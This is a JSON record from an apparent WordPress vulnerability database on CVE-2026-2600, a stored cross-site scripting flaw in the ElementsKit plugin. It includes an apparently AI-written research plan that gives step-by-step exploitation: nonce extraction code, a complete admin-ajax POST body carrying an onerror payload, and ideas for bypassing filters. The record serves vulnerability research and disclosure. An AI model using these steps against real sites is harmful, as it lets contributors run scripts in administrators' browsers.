[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fh1Cvs4ZfbEHcfvAkBtY-sWyYENLLdzySdhtjk3qw0UI":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":29,"research_verified":30,"research_rounds_completed":31,"research_plan":32,"research_summary":33,"research_vulnerable_code":9,"research_fix_diff":34,"research_exploit_outline":35,"research_model_used":36,"research_started_at":37,"research_completed_at":38,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":30,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":30,"source_links":39},"CVE-2026-2600","elementskit-elementor-addons-and-templates-authenticated-contributor-stored-cross-site-scripting-via-simple-tab-widget","ElementsKit Elementor Addons and Templates \u003C= 3.7.9 - Authenticated (Contributor+) Stored Cross-Site Scripting via Simple Tab Widget","The ElementsKit Elementor Addons and Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'ekit_tab_title' parameter in the Simple Tab widget in all versions up to, and including, 3.7.9 due to insufficient input sanitization and output escaping on user supplied attributes. 
This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","elementskit-lite",null,"\u003C=3.7.9","3.8.0","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-04-03 19:37:48","2026-04-04 07:41:58",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F4c33c640-0876-4b07-829e-35cae445b420?source=api-prod",1,[22,23,24,25,26,27,28],"config\u002Fmodule-list.php","config\u002Fwidget-list.php","core\u002Fbuild-inline-scripts.php","core\u002Fconfig-list.php","core\u002Fhandler-api.php","elementskit-lite.php","helpers\u002Futils.php","researched",false,3,"# Vulnerability Research Plan: CVE-2026-2600 - ElementsKit Stored XSS via Simple Tab Widget\n\n## 1. Vulnerability Summary\nThe **ElementsKit Elementor Addons and Templates** plugin (versions \u003C= 3.7.9) is vulnerable to **Stored Cross-Site Scripting (XSS)**. The vulnerability exists in the **Simple Tab** widget (often referred to as the \"Tab\" widget in the UI). Specifically, the `ekit_tab_title` parameter, which stores the title of a tab item, is not properly sanitized upon input or escaped upon output. This allows an authenticated attacker with **Contributor-level** permissions (who can edit posts via Elementor) to inject malicious JavaScript into a page. The script executes whenever a user (including administrators) views the affected page.\n\n## 2. 
Attack Vector Analysis\n- **Endpoint**: `wp-admin\u002Fadmin-ajax.php`\n- **Action**: `elementor_ajax` (used by the Elementor editor to save widget data)\n- **Sub-Action**: `save_builder_data`\n- **Vulnerable Parameter**: `ekit_tab_title` (within the `settings` object of an `elementskit-tab` widget)\n- **Required Authentication**: Contributor or higher.\n- **Preconditions**:\n    - The ElementsKit Lite plugin is active.\n    - The Elementor plugin is active.\n    - The attacker has a Contributor account and can edit a post\u002Fpage using the Elementor editor.\n\n## 3. Code Flow\n1. **Input**: A user with Contributor access opens a post in the Elementor editor.\n2. **Action**: The user adds an \"ElementsKit Tab\" widget and sets a tab title.\n3. **Transmission**: Elementor sends a POST request to `admin-ajax.php?action=elementor_ajax`. The payload is a JSON string containing the widget's settings.\n4. **Processing**: The plugin (via Elementor's framework) saves these settings into the WordPress database as post metadata (`_elementor_data`).\n5. **Vulnerable Parameter Path**: \n   - `settings` -> `ekit_tab_items` (repeater) -> `ekit_tab_title`.\n6. **Rendering (Sink)**: When the page is viewed on the frontend, the widget's rendering function (likely in a file like `widgets\u002Ftab\u002Ftab.php`, though not provided in the snippet, this is standard ElementsKit architecture) iterates through the tab items.\n7. **Output**: The value of `ekit_tab_title` is echoed to the page without being passed through `esc_html()` or a restrictive `wp_kses()` call.\n\n## 4. Nonce Acquisition Strategy\nElementor uses its own internal security nonce for AJAX operations. To successfully save builder data, we must obtain this nonce.\n\n### Acquisition Steps:\n1. **Login**: Authenticate as a **Contributor**.\n2. **Access Editor**: Create a new post or edit an existing one: `wp-admin\u002Fpost.php?post=POST_ID&action=elementor`.\n3. 
**Extract Nonce**: The Elementor nonce is stored in a JavaScript object localized on the page.\n4. **JS Variable**: `window.elementorCommonConfig.ajax.nonce` or `window.elementorConfig.ajax.nonce`.\n5. **Tool Usage**: Use `browser_navigate` to open the editor and `browser_eval` to extract the nonce.\n\n```javascript\n\u002F\u002F Extraction payload\nconst nonce = window.elementorCommonConfig?.ajax?.nonce || window.elementorConfig?.ajax?.nonce;\nreturn nonce;\n```\n\n## 5. Exploitation Strategy\nThe exploit involves sending a crafted Elementor AJAX request to update a post's content with a malicious ElementsKit Tab widget.\n\n### Step-by-Step Plan:\n1. **Identify Post**: Find a post ID that the Contributor can edit.\n2. **Fetch Nonce**: Navigate to the Elementor editor for that post and extract the nonce as described in Section 4.\n3. **Craft Payload**: Create a JSON payload for the `elementor_ajax` action.\n    - `action`: `elementor_ajax`\n    - `_nonce`: [EXTRACTED_NONCE]\n    - `actions`: A JSON-encoded object containing the `save_builder_data` command.\n4. **Malicious Widget Data**:\n   ```json\n   {\n     \"id\": \"malicious-tab-id\",\n     \"elType\": \"widget\",\n     \"widgetType\": \"elementskit-tab\",\n     \"settings\": {\n       \"ekit_tab_items\": [\n         {\n           \"ekit_tab_title\": \"\u003Cimg src=x onerror=alert('CVE-2026-2600')>\",\n           \"ekit_tab_content\": \"Standard Content\"\n         }\n       ]\n     }\n   }\n   ```\n5. 
**HTTP Request**:\n   - **Method**: POST\n   - **URL**: `[TARGET_URL]\u002Fwp-admin\u002Fadmin-ajax.php`\n   - **Content-Type**: `application\u002Fx-www-form-urlencoded`\n   - **Body**: \n     ```\n     action=elementor_ajax&\n     _nonce=[NONCE]&\n     actions={\"save_builder_data\":{\"post_id\":\"[POST_ID]\",\"data\":[{\"id\":\"container-id\",\"elType\":\"container\",\"settings\":[],\"elements\":[{\"id\":\"malicious-tab-id\",\"elType\":\"widget\",\"widgetType\":\"elementskit-tab\",\"settings\":{\"ekit_tab_items\":[{\"ekit_tab_title\":\"\u003Cimg src=x onerror=alert('CVE-2026-2600')>\",\"ekit_tab_content\":\"Content\"}]}}]}]}}\n     ```\n\n## 6. Test Data Setup\n1. **User**: Create a user with the `contributor` role.\n2. **Post**: Create a post with `post_status='publish'` authored by the contributor.\n3. **Plugin Config**: Ensure `elementskit-lite` is active. In the ElementsKit dashboard, ensure the \"Tab\" widget is enabled (it is enabled by default in `config\u002Fwidget-list.php`).\n\n## 7. Expected Results\n- The HTTP request should return a `200 OK` with a JSON body indicating success: `{\"success\":true,\"data\":{...}}`.\n- When navigating to the post URL on the frontend (e.g., `\u002F?p=[POST_ID]`), an alert box with `CVE-2026-2600` should appear.\n- The HTML source of the page should contain: `\u003Cimg src=x onerror=alert('CVE-2026-2600')>`.\n\n## 8. Verification Steps\n1. **WP-CLI**: Verify the meta value is stored in the database.\n   ```bash\n   wp post meta get [POST_ID] _elementor_data\n   ```\n2. **Check for Payload**: Inspect the output of the CLI command for the presence of the `\u003Cimg src=x ...>` string.\n3. **Frontend Check**: Use the `browser_navigate` tool to open the frontend URL of the post and check for the execution of the alert.\n\n## 9. 
Alternative Approaches\n- **SVG Infiltration**: If `\u003Cscript>` or `\u003Cimg>` tags are filtered by a WAF but `wp_kses` is used with the `get_kses_array()` from `helpers\u002Futils.php`, note that `svg` and `path` tags are allowed in that list (Lines 163-176). An attacker might try injecting an SVG with an `onload` attribute if the `kses` call is present but misconfigured.\n- **Style Injection**: If the title is rendered inside a `style` attribute (unlikely for a title, but possible for styling tab headers), one could use `expression()` (old IE) or breakout techniques.\n- **REST API**: Check if the `elementskit\u002Fv1\u002Fwidget-builder` endpoint (seen in `config\u002Fmodule-list.php`) allows modification of widget data without going through Elementor's standard AJAX. (Requires checking `core\u002Fhandler-api.php`).","The ElementsKit Elementor Addons and Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Simple Tab widget. Authenticated attackers with contributor-level permissions can inject malicious JavaScript into the 'ekit_tab_title' parameter, which is then executed in the context of any user viewing the affected page due to missing output escaping.","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Felementskit-lite\u002F3.7.9\u002Fconfig\u002Fmodule-list.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Felementskit-lite\u002F3.8.0\u002Fconfig\u002Fmodule-list.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Felementskit-lite\u002F3.7.9\u002Fconfig\u002Fmodule-list.php\t2026-02-03 09:00:52.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Felementskit-lite\u002F3.8.0\u002Fconfig\u002Fmodule-list.php\t2026-02-24 06:00:14.000000000 +0000\n@@ -136,6 +136,12 @@\n \t\t\t\t\t'title'             => 'Global Badge',\n \t\t\t\t\t'attributes'        => array( 'new' ),\n 
\t\t\t\t],\n+\t\t\t\t'scroll-reveal' => [\n+\t\t\t\t\t'slug'              => 'scroll-reveal',\n+\t\t\t\t\t'package'           => 'pro-disabled',\n+\t\t\t\t\t'title'             => 'Scroll Reveal',\n+\t\t\t\t\t'attributes'        => array( 'upcoming' ),\n+\t\t\t\t],\n \t\t\t)\n \t\t);\n \t}\ndiff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Felementskit-lite\u002F3.7.9\u002Fconfig\u002Fwidget-list.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Felementskit-lite\u002F3.8.0\u002Fconfig\u002Fwidget-list.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Felementskit-lite\u002F3.7.9\u002Fconfig\u002Fwidget-list.php\t2026-02-03 09:00:52.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Felementskit-lite\u002F3.8.0\u002Fconfig\u002Fwidget-list.php\t2026-02-24 06:00:14.000000000 +0000\n@@ -277,282 +277,329 @@\n \t\t\t\t\t'title'           => 'Advanced Accordion',\n \t\t\t\t\t'package'         => 'pro-disabled',\n \t\t\t\t\t'widget-category' => 'advanced', \u002F\u002F advanced\n+\t\t\t\t\t'icon'            => 'ekit ekit-accordion',\n \t\t\t\t),\n \t\t\t\t'advanced-tab' => array(\n \t\t\t\t\t'slug'            => 'advanced-tab',\n \t\t\t\t\t'title'           => 'Advanced Tab',\n \t\t\t\t\t'package'         => 'pro-disabled',\n \t\t\t\t\t'widget-category' => 'advanced', \u002F\u002F advanced\n+\t\t\t\t\t'icon'            => 'ekit ekit-tab',\n \t\t\t\t),","To exploit this vulnerability, an attacker must have at least Contributor-level access to the WordPress site. The attacker performs the following steps: \n1. Log in to the WordPress dashboard as a Contributor.\n2. Access the Elementor editor for a post or page the user is authorized to edit.\n3. Extract the required Elementor AJAX nonce from the localized JavaScript object `window.elementorCommonConfig.ajax.nonce`.\n4. 
Craft a malicious JSON payload targeting the `elementor_ajax` endpoint with the `save_builder_data` action.\n5. The payload includes an `elementskit-tab` widget containing a repeater item where the `ekit_tab_title` parameter is set to a malicious script, such as `\u003Cimg src=x onerror=alert(document.domain)>`.\n6. Send the crafted POST request to `\u002Fwp-admin\u002Fadmin-ajax.php`.\n7. Once saved, the script will execute in the browser of any user who navigates to the public URL of the modified post.","gemini-3-flash-preview","2026-04-17 21:35:42","2026-04-17 21:36:17",{"type":40,"vulnerable_version":41,"fixed_version":11,"vulnerable_browse":42,"vulnerable_zip":43,"fixed_browse":44,"fixed_zip":45,"all_tags":46},"plugin","3.7.9","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Felementskit-lite\u002Ftags\u002F3.7.9","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Felementskit-lite.3.7.9.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Felementskit-lite\u002Ftags\u002F3.8.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Felementskit-lite.3.8.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Felementskit-lite\u002Ftags"]